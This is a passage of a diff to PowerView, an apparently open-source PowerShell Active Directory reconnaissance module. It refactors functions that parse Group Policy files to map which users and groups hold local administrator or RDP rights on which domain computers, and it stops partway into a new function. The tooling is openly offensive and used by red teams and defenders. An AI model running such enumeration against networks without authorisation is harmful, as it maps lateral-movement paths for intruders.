+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ $ConvertArguments = @{}
+ if ($PSBoundParameters['Domain']) { $ConvertArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $ConvertArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $ConvertArguments['Credential'] = $Credential }
+
+ $SplitOption = [System.StringSplitOptions]::RemoveEmptyEntries
+ }
- if($ResolveMemberSIDs) {
- # if the resulting member is username and not a SID, attempt to resolve it
- $GroupMembers = @()
- ForEach($Member in $MembershipValue) {
- if($Member -and ($Member.Trim() -ne '')) {
- if($Member -notmatch '^S-1-.*') {
- $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID
- if($MemberSID) {
- $GroupMembers += $MemberSID
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainGPO @SearcherArguments | ForEach-Object {
+ $GPOdisplayName = $_.displayname
+ $GPOname = $_.name
+ $GPOPath = $_.gpcfilesyspath
+
+ $ParseArgs = @{ 'GptTmplPath' = "$GPOPath\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf" }
+ if ($PSBoundParameters['Credential']) { $ParseArgs['Credential'] = $Credential }
+
+ # first parse the 'Restricted Groups' file (GptTmpl.inf) if it exists
+ $Inf = Get-GptTmpl @ParseArgs
+
+ if ($Inf -and ($Inf.psbase.Keys -contains 'Group Membership')) {
+ $Memberships = @{}
+
+ # parse the members/memberof fields for each entry
+ ForEach ($Membership in $Inf.'Group Membership'.GetEnumerator()) {
+ $Group, $Relation = $Membership.Key.Split('__', $SplitOption) | ForEach-Object {$_.Trim()}
+ # extract out ALL members
+ $MembershipValue = $Membership.Value | Where-Object {$_} | ForEach-Object { $_.Trim('*') } | Where-Object {$_}
+
+ if ($PSBoundParameters['ResolveMembersToSIDs']) {
+ # if the resulting member is username and not a SID, attempt to resolve it
+ $GroupMembers = @()
+ ForEach ($Member in $MembershipValue) {
+ if ($Member -and ($Member.Trim() -ne '')) {
+ if ($Member -notmatch '^S-1-.*') {
+ $ConvertToArguments = @{'ObjectName' = $Member}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $MemberSID = ConvertTo-SID @ConvertToArguments
+
+ if ($MemberSID) {
+ $GroupMembers += $MemberSID
+ }
+ else {
+ $GroupMembers += $Member
+ }
}
else {
$GroupMembers += $Member
}
}
- else {
- $GroupMembers += $Member
- }
}
+ $MembershipValue = $GroupMembers
}
- $MembershipValue = $GroupMembers
- }
- if(-not $Memberships[$Group]) {
- $Memberships[$Group] = @{}
- }
- if($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
- $Memberships[$Group].Add($Relation, $MembershipValue)
- }
-
- ForEach ($Membership in $Memberships.GetEnumerator()) {
- if($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
- # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
- $GroupSID = $Membership.Key.Trim('*')
- if($GroupSID -and ($GroupSID.Trim() -ne '')) {
- $GroupName = Convert-SidToName -SID $GroupSID
- }
- else {
- $GroupName = $False
+ if (-not $Memberships[$Group]) {
+ $Memberships[$Group] = @{}
}
+ if ($MembershipValue -isnot [System.Array]) {$MembershipValue = @($MembershipValue)}
+ $Memberships[$Group].Add($Relation, $MembershipValue)
}
- else {
- $GroupName = $Membership.Key
- if($GroupName -and ($GroupName.Trim() -ne '')) {
- if($Groupname -match 'Administrators') {
- $GroupSID = 'S-1-5-32-544'
- }
- elseif($Groupname -match 'Remote Desktop') {
- $GroupSID = 'S-1-5-32-555'
- }
- elseif($Groupname -match 'Guests') {
- $GroupSID = 'S-1-5-32-546'
- }
- elseif($GroupName.Trim() -ne '') {
- $GroupSID = Convert-NameToSid -Domain $Domain -ObjectName $Groupname | Select-Object -ExpandProperty SID
+ ForEach ($Membership in $Memberships.GetEnumerator()) {
+ if ($Membership -and $Membership.Key -and ($Membership.Key -match '^\*')) {
+ # if the SID is already resolved (i.e. begins with *) try to resolve SID to a name
+ $GroupSID = $Membership.Key.Trim('*')
+ if ($GroupSID -and ($GroupSID.Trim() -ne '')) {
+ $GroupName = ConvertFrom-SID -ObjectSID $GroupSID @ConvertArguments
}
else {
- $GroupSID = $Null
+ $GroupName = $False
}
}
+ else {
+ $GroupName = $Membership.Key
+
+ if ($GroupName -and ($GroupName.Trim() -ne '')) {
+ if ($Groupname -match 'Administrators') {
+ $GroupSID = 'S-1-5-32-544'
+ }
+ elseif ($Groupname -match 'Remote Desktop') {
+ $GroupSID = 'S-1-5-32-555'
+ }
+ elseif ($Groupname -match 'Guests') {
+ $GroupSID = 'S-1-5-32-546'
+ }
+ elseif ($GroupName.Trim() -ne '') {
+ $ConvertToArguments = @{'ObjectName' = $Groupname}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $GroupSID = ConvertTo-SID @ConvertToArguments
+ }
+ else {
+ $GroupSID = $Null
+ }
+ }
+ }
+
+ $GPOGroup = New-Object PSObject
+ $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+ $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
+ $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
+ $GPOGroup | Add-Member Noteproperty 'Filters' $Null
+ $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
+ $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
+ $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
+ $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
+ $GPOGroup.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+ $GPOGroup
}
+ }
- $GPOGroup = New-Object PSObject
- $GPOGroup | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
- $GPOGroup | Add-Member Noteproperty 'GPOName' $GPOName
- $GPOGroup | Add-Member Noteproperty 'GPOPath' $GPOPath
- $GPOGroup | Add-Member Noteproperty 'GPOType' 'RestrictedGroups'
- $GPOGroup | Add-Member Noteproperty 'Filters' $Null
- $GPOGroup | Add-Member Noteproperty 'GroupName' $GroupName
- $GPOGroup | Add-Member Noteproperty 'GroupSID' $GroupSID
- $GPOGroup | Add-Member Noteproperty 'GroupMemberOf' $Membership.Value.Memberof
- $GPOGroup | Add-Member Noteproperty 'GroupMembers' $Membership.Value.Members
- $GPOGroup
+ # now try to the parse group policy preferences file (Groups.xml) if it exists
+ $ParseArgs = @{
+ 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
}
- }
- $ParseArgs = @{
- 'GroupsXMLpath' = "$GPOPath\MACHINE\Preferences\Groups\Groups.xml"
- 'UsePSDrive' = $UsePSDrive
- }
+ Get-GroupsXML @ParseArgs | ForEach-Object {
+ if ($PSBoundParameters['ResolveMembersToSIDs']) {
+ $GroupMembers = @()
+ ForEach ($Member in $_.GroupMembers) {
+ if ($Member -and ($Member.Trim() -ne '')) {
+ if ($Member -notmatch '^S-1-.*') {
+
+ # if the resulting member is username and not a SID, attempt to resolve it
+ $ConvertToArguments = @{'ObjectName' = $Groupname}
+ if ($PSBoundParameters['Domain']) { $ConvertToArguments['Domain'] = $Domain }
+ $MemberSID = ConvertTo-SID -Domain $Domain -ObjectName $Member
- Get-GroupsXML @ParseArgs | ForEach-Object {
- if($ResolveMemberSIDs) {
- $GroupMembers = @()
- ForEach($Member in $_.GroupMembers) {
- if($Member -and ($Member.Trim() -ne '')) {
- if($Member -notmatch '^S-1-.*') {
- # if the resulting member is username and not a SID, attempt to resolve it
- $MemberSID = Convert-NameToSid -Domain $Domain -ObjectName $Member | Select-Object -ExpandProperty SID
- if($MemberSID) {
- $GroupMembers += $MemberSID
+ if ($MemberSID) {
+ $GroupMembers += $MemberSID
+ }
+ else {
+ $GroupMembers += $Member
+ }
}
else {
$GroupMembers += $Member
}
}
- else {
- $GroupMembers += $Member
- }
}
+ $_.GroupMembers = $GroupMembers
}
- $_.GroupMembers = $GroupMembers
- }
- $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
- $_ | Add-Member Noteproperty 'GPOName' $GPOName
- $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
- $_
+ $_ | Add-Member Noteproperty 'GPODisplayName' $GPODisplayName
+ $_ | Add-Member Noteproperty 'GPOName' $GPOName
+ $_ | Add-Member Noteproperty 'GPOType' 'GroupPolicyPreferences'
+ $_.PSObject.TypeNames.Insert(0, 'PowerView.GPOGroup')
+ $_
+ }
}
}
}
-function Find-GPOLocation {
+function Get-DomainGPOUserLocalGroupMapping {
<#
- .SYNOPSIS
-
- Enumerates the machines where a specific user/group is a member of a specific
- local group, all through GPO correlation.
+.SYNOPSIS
+
+Enumerates the machines where a specific domain user/group is a member of a specific
+local group, all through GPO correlation. If no user/group is specified, all
+discoverable mappings are returned.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup
+
+.DESCRIPTION
+
+Takes a user/group name and optional domain, and determines the computers in the domain
+the user/group has local admin (or RDP) rights to.
+
+It does this by:
+ 1. resolving the user/group to its proper SID
+ 2. enumerating all groups the user/group is a current part of
+ and extracting all target SIDs to build a target SID list
+ 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
+ Get-DomainGPOLocalGroup
+ 4. matching the target SID list to the queried GPO SID list
+ to enumerate all GPO the user is effectively applied with
+ 5. enumerating all OUs and sites and applicable GPO GUIs are
+ applied to through gplink enumerating
+ 6. querying for all computers under the given OUs or sites
- Author: @harmj0y
- License: BSD 3-Clause
- Required Dependencies: Get-NetUser, Get-NetGroup, Get-NetGPOGroup, Get-NetOU, Get-NetComputer, Get-ADObject, Get-NetSite
- Optional Dependencies: None
+If no user/group is specified, all user/group -> machine mappings discovered through
+GPO relationships are returned.
- .DESCRIPTION
+.PARAMETER Identity
- Takes a user/group name and optional domain, and determines the computers in the domain
- the user/group has local admin (or RDP) rights to.
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+for the user/group to identity GPO local group mappings for.
- It does this by:
- 1. resolving the user/group to its proper SID
- 2. enumerating all groups the user/group is a current part of
- and extracting all target SIDs to build a target SID list
- 3. pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling
- Get-NetGPOGroup
- 4. matching the target SID list to the queried GPO SID list
- to enumerate all GPO the user is effectively applied with
- 5. enumerating all OUs and sites and applicable GPO GUIs are
- applied to through gplink enumerating
- 6. querying for all computers under the given OUs or sites
-
- If no user/group is specified, all user/group -> machine mappings discovered through
- GPO relationships are returned.
+.PARAMETER LocalGroup
- .PARAMETER UserName
+The local group to check access against.
+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
+or a custom local SID. Defaults to local 'Administrators'.
- A (single) user name name to query for access.
+.PARAMETER Domain
- .PARAMETER GroupName
+Specifies the domain to enumerate GPOs for, defaults to the current domain.
- A (single) group name name to query for access.
+.PARAMETER Server
- .PARAMETER Domain
+Specifies an Active Directory server (domain controller) to bind to.
- Optional domain the user exists in for querying, defaults to the current domain.
+.PARAMETER SearchScope
- .PARAMETER DomainController
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- Domain controller to reflect LDAP queries through.
+.PARAMETER ResultPageSize
- .PARAMETER LocalGroup
+Specifies the PageSize to set for the LDAP searcher object.
- The local group to check access against.
- Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),
- or a custom local SID. Defaults to local 'Administrators'.
+.PARAMETER ServerTimeLimit
- .PARAMETER UsePSDrive
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Switch. Mount any found policy files with temporary PSDrives.
+.PARAMETER Tombstone
- .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Credential
- .EXAMPLE
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- PS C:\> Find-GPOLocation
+.EXAMPLE
- Find all user/group -> machine relationships where the user/group is a member
- of the local administrators group on target machines.
+Get-DomainGPOUserLocalGroupMapping
- .EXAMPLE
+Find all user/group -> machine relationships where the user/group is a member
+of the local administrators group on target machines.
- PS C:\> Find-GPOLocation -UserName dfm
-
- Find all computers that dfm user has local administrator rights to in
- the current domain.
+.EXAMPLE
- .EXAMPLE
+Get-DomainGPOUserLocalGroupMapping -Identity dfm -Domain dev.testlab.local
- PS C:\> Find-GPOLocation -UserName dfm -Domain dev.testlab.local
-
- Find all computers that dfm user has local administrator rights to in
- the dev.testlab.local domain.
+Find all computers that dfm user has local administrator rights to in
+the dev.testlab.local domain.
- .EXAMPLE
+.EXAMPLE
- PS C:\> Find-GPOLocation -UserName jason -LocalGroup RDP
-
- Find all computers that jason has local RDP access rights to in the domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPOUserLocalGroupMapping -Credential $Cred
+
+.OUTPUTS
+
+PowerView.GPOLocalGroupMapping
+
+A custom PSObject containing any target identity information and what local
+group memberships they're a part of through GPO correlation.
+
+.LINK
+
+http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.GPOUserLocalGroupMapping')]
[CmdletBinding()]
- Param (
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String]
- $UserName,
+ $Identity,
[String]
- $GroupName,
+ [ValidateSet('Administrators', 'S-1-5-32-544', 'RDP', 'Remote Desktop Users', 'S-1-5-32-555')]
+ $LocalGroup = 'Administrators',
+ [ValidateNotNullOrEmpty()]
[String]
$Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $LocalGroup = 'Administrators',
-
- [Switch]
- $UsePSDrive,
-
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200
- )
+ $Server,
- if($UserName) {
- # if a group name is specified, get that user object so we can extract the target SID
- $User = Get-NetUser -UserName $UserName -Domain $Domain -DomainController $DomainController -PageSize $PageSize | Select-Object -First 1
- $UserSid = $User.objectsid
-
- if(-not $UserSid) {
- Throw "User '$UserName' not found!"
- }
-
- $TargetSIDs = @($UserSid)
- $ObjectSamAccountName = $User.samaccountname
- $TargetObject = $UserSid
- }
- elseif($GroupName) {
- # if a group name is specified, get that group object so we can extract the target SID
- $Group = Get-NetGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Select-Object -First 1
- $GroupSid = $Group.objectsid
-
- if(-not $GroupSid) {
- Throw "Group '$GroupName' not found!"
- }
-
- $TargetSIDs = @($GroupSid)
- $ObjectSamAccountName = $Group.samaccountname
- $TargetObject = $GroupSid
- }
- else {
- $TargetSIDs = @('*')
- }
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- # figure out what the SID is of the target local group we're checking for membership in
- if($LocalGroup -like "*Admin*") {
- $TargetLocalSID = 'S-1-5-32-544'
- }
- elseif ( ($LocalGroup -like "*RDP*") -or ($LocalGroup -like "*Remote*") ) {
- $TargetLocalSID = 'S-1-5-32-555'
- }
- elseif ($LocalGroup -like "S-1-5-*") {
- $TargetLocalSID = $LocalGroup
- }
- else {
- throw "LocalGroup must be 'Administrators', 'RDP', or a 'S-1-5-X' SID format."
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- # if we're not listing all relationships, use the tokenGroups approach from Get-NetGroup to
- # get all effective security SIDs this object is a part of
- if($TargetSIDs[0] -and ($TargetSIDs[0] -ne '*')) {
- $TargetSIDs += Get-NetGroup -Domain $Domain -DomainController $DomainController -PageSize $PageSize -UserName $ObjectSamAccountName -RawSids
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- if(-not $TargetSIDs) {
- throw "No effective target SIDs!"
- }
+ [Switch]
+ $Tombstone,
- Write-Verbose "TargetLocalSID: $TargetLocalSID"
- Write-Verbose "Effective target SIDs: $TargetSIDs"
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- $GPOGroupArgs = @{
- 'Domain' = $Domain
- 'DomainController' = $DomainController
- 'UsePSDrive' = $UsePSDrive
- 'ResolveMemberSIDs' = $True
- 'PageSize' = $PageSize
+ BEGIN {
+ $CommonArguments = @{}
+ if ($PSBoundParameters['Domain']) { $CommonArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $CommonArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $CommonArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $CommonArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $CommonArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $CommonArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $CommonArguments['Credential'] = $Credential }
}
- # enumerate all GPO group mappings for the target domain that involve our target SID set
- $GPOgroups = Get-NetGPOGroup @GPOGroupArgs | ForEach-Object {
-
- $GPOgroup = $_
+ PROCESS {
+ $TargetSIDs = @()
- # if the locally set group is what we're looking for, check the GroupMembers ('members')
- # for our target SID
- if($GPOgroup.GroupSID -match $TargetLocalSID) {
- $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
- if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
- $GPOgroup
- }
+ if ($PSBoundParameters['Identity']) {
+ $TargetSIDs += Get-DomainObject @CommonArguments -Identity $Identity | Select-Object -Expand objectsid
+ $TargetObjectSID = $TargetSIDs
+ if (-not $TargetSIDs) {
+ Throw "[Get-DomainGPOUserLocalGroupMapping] Unable to retrieve SID for identity '$Identity'"
}
}
- # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs
- if( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
- if( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
- $GPOgroup
- }
+ else {
+ # no filtering/match all
+ $TargetSIDs = @('*')
}
- } | Sort-Object -Property GPOName -Unique
-
- $GPOgroups | ForEach-Object {
- $GPOname = $_.GPODisplayName
- $GPOguid = $_.GPOName
- $GPOPath = $_.GPOPath
- $GPOType = $_.GPOType
- if($_.GroupMembers) {
- $GPOMembers = $_.GroupMembers
+ if ($LocalGroup -match 'S-1-5') {
+ $TargetLocalSID = $LocalGroup
+ }
+ elseif ($LocalGroup -match 'Admin') {
+ $TargetLocalSID = 'S-1-5-32-544'
}
else {
- $GPOMembers = $_.GroupSID
+ # RDP
+ $TargetLocalSID = 'S-1-5-32-555'
}
-
- $Filters = $_.Filters
- if(-not $TargetObject) {
- # if the * wildcard was used, set the ObjectDistName as the GPO member SID set
- # so all relationship mappings are output
- $TargetObjectSIDs = $GPOMembers
- }
- else {
- $TargetObjectSIDs = $TargetObject
+ if ($TargetSIDs[0] -ne '*') {
+ ForEach ($TargetSid in $TargetSids) {
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Enumerating nested group memberships for: '$TargetSid'"
+ $TargetSIDs += Get-DomainGroup @CommonArguments -Properties 'objectsid' -MemberIdentity $TargetSid | Select-Object -ExpandProperty objectsid
+ }
}
- # find any OUs that have this GUID applied and then retrieve any computers from the OU
- Get-NetOU -Domain $Domain -DomainController $DomainController -GUID $GPOguid -FullData -PageSize $PageSize | ForEach-Object {
- if($Filters) {
- # filter for computer name/org unit if a filter is specified
- # TODO: handle other filters (i.e. OU filters?) again, I hate you GPP...
- $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -FullData -PageSize $PageSize | Where-Object {
- $_.adspath -match ($Filters.Value)
- } | ForEach-Object { $_.dnshostname }
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Target localgroup SID: $TargetLocalSID"
+ Write-Verbose "[Get-DomainGPOUserLocalGroupMapping] Effective target domain SIDs: $TargetSIDs"
+
+ $GPOgroups = Get-DomainGPOLocalGroup @CommonArguments -ResolveMembersToSIDs | ForEach-Object {
+ $GPOgroup = $_
+ # if the locally set group is what we're looking for, check the GroupMembers ('members') for our target SID
+ if ($GPOgroup.GroupSID -match $TargetLocalSID) {
+ $GPOgroup.GroupMembers | Where-Object {$_} | ForEach-Object {
+ if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $_) ) {
+ $GPOgroup
+ }
+ }
+ }
+ # if the group is a 'memberof' the group we're looking for, check GroupSID against the targt SIDs
+ if ( ($GPOgroup.GroupMemberOf -contains $TargetLocalSID) ) {
+ if ( ($TargetSIDs[0] -eq '*') -or ($TargetSIDs -Contains $GPOgroup.GroupSID) ) {
+ $GPOgroup
+ }
+ }
+ } | Sort-Object -Property GPOName -Unique
+
+ $GPOgroups | Where-Object {$_} | ForEach-Object {
+ $GPOname = $_.GPODisplayName
+ $GPOguid = $_.GPOName
+ $GPOPath = $_.GPOPath
+ $GPOType = $_.GPOType
+ if ($_.GroupMembers) {
+ $GPOMembers = $_.GroupMembers
}
else {
- $OUComputers = Get-NetComputer -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $_.ADSpath -PageSize $PageSize
+ $GPOMembers = $_.GroupSID
}
- if($OUComputers) {
- if($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
+ $Filters = $_.Filters
- ForEach ($TargetSid in $TargetObjectSIDs) {
- $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize
+ if ($TargetSIDs[0] -eq '*') {
+ # if the * wildcard was used, set the targets to all GPO members so everything it output
+ $TargetObjectSIDs = $GPOMembers
+ }
+ else {
+ $TargetObjectSIDs = $TargetObjectSID
+ }
- $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+ # find any OUs that have this GPO linked through gpLink
+ Get-DomainOU @CommonArguments -Raw -Properties 'name,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+ if ($Filters) {
+ $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname,distinguishedname' -SearchBase $_.Path | Where-Object {$_.distinguishedname -match ($Filters.Value)} | Select-Object -ExpandProperty dnshostname
+ }
+ else {
+ $OUComputers = Get-DomainComputer @CommonArguments -Properties 'dnshostname' -SearchBase $_.Path | Select-Object -ExpandProperty dnshostname
+ }
- $GPOLocation = New-Object PSObject
- $GPOLocation | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
- $GPOLocation | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
- $GPOLocation | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
- $GPOLocation | Add-Member Noteproperty 'Domain' $Domain
- $GPOLocation | Add-Member Noteproperty 'IsGroup' $IsGroup
- $GPOLocation | Add-Member Noteproperty 'GPODisplayName' $GPOname
- $GPOLocation | Add-Member Noteproperty 'GPOGuid' $GPOGuid
- $GPOLocation | Add-Member Noteproperty 'GPOPath' $GPOPath
- $GPOLocation | Add-Member Noteproperty 'GPOType' $GPOType
- $GPOLocation | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
- $GPOLocation | Add-Member Noteproperty 'ComputerName' $OUComputers
- $GPOLocation.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')
- $GPOLocation
+ if ($OUComputers) {
+ if ($OUComputers -isnot [System.Array]) {$OUComputers = @($OUComputers)}
+
+ ForEach ($TargetSid in $TargetObjectSIDs) {
+ $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
+
+ $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+
+ $GPOLocalGroupMapping = New-Object PSObject
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.Properties.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $OUComputers
+ $GPOLocalGroupMapping.PSObject.TypeNames.Insert(0, 'PowerView.GPOLocalGroupMapping')
+ $GPOLocalGroupMapping
+ }
}
}
- }
-
- # find any sites that have this GUID applied
- Get-NetSite -Domain $Domain -DomainController $DomainController -GUID $GPOguid -PageSize $PageSize -FullData | ForEach-Object {
- ForEach ($TargetSid in $TargetObjectSIDs) {
- $Object = Get-ADObject -SID $TargetSid -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize
+ # find any sites that have this GPO linked through gpLink
+ Get-DomainSite @CommonArguments -Properties 'siteobjectbl,distinguishedname' -GPLink $GPOGuid | ForEach-Object {
+ ForEach ($TargetSid in $TargetObjectSIDs) {
+ $Object = Get-DomainObject @CommonArguments -Identity $TargetSid -Properties 'samaccounttype,samaccountname,distinguishedname,objectsid'
- $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
+ $IsGroup = @('268435456','268435457','536870912','536870913') -contains $Object.samaccounttype
- $AppliedSite = New-Object PSObject
- $AppliedSite | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
- $AppliedSite | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
- $AppliedSite | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
- $AppliedSite | Add-Member Noteproperty 'IsGroup' $IsGroup
- $AppliedSite | Add-Member Noteproperty 'Domain' $Domain
- $AppliedSite | Add-Member Noteproperty 'GPODisplayName' $GPOname
- $AppliedSite | Add-Member Noteproperty 'GPOGuid' $GPOGuid
- $AppliedSite | Add-Member Noteproperty 'GPOPath' $GPOPath
- $AppliedSite | Add-Member Noteproperty 'GPOType' $GPOType
- $AppliedSite | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
- $AppliedSite | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
- $AppliedSite.PSObject.TypeNames.Add('PowerView.GPOLocalGroup')
- $AppliedSite
+ $GPOLocalGroupMapping = New-Object PSObject
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectName' $Object.samaccountname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectDN' $Object.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ObjectSID' $Object.objectsid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'IsGroup' $IsGroup
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'Domain' $Domain
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPODisplayName' $GPOname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOGuid' $GPOGuid
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOPath' $GPOPath
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'GPOType' $GPOType
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ContainerName' $_.distinguishedname
+ $GPOLocalGroupMapping | Add-Member Noteproperty 'ComputerName' $_.siteobjectbl
+ $GPOLocalGroupMapping.PSObject.TypeNames.Add('PowerView.GPOLocalGroupMapping')
+ $GPOLocalGroupMapping
+ }
}
}
}
}
-function Find-GPOComputerAdmin {
+function Get-DomainGPOComputerLocalGroupMapping {
<#
- .SYNOPSIS
+.SYNOPSIS
+
+Takes a computer (or GPO) object and determines what users/groups are in the specified
+local group for the machine through GPO correlation.
+
+Author: @harmj0y
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup
+
+.DESCRIPTION
+
+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups
+are in the specified local group for a target machine through GPO correlation.
+
+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to
+determine the OU the computer is a part of. Then resolve the computer's site name with
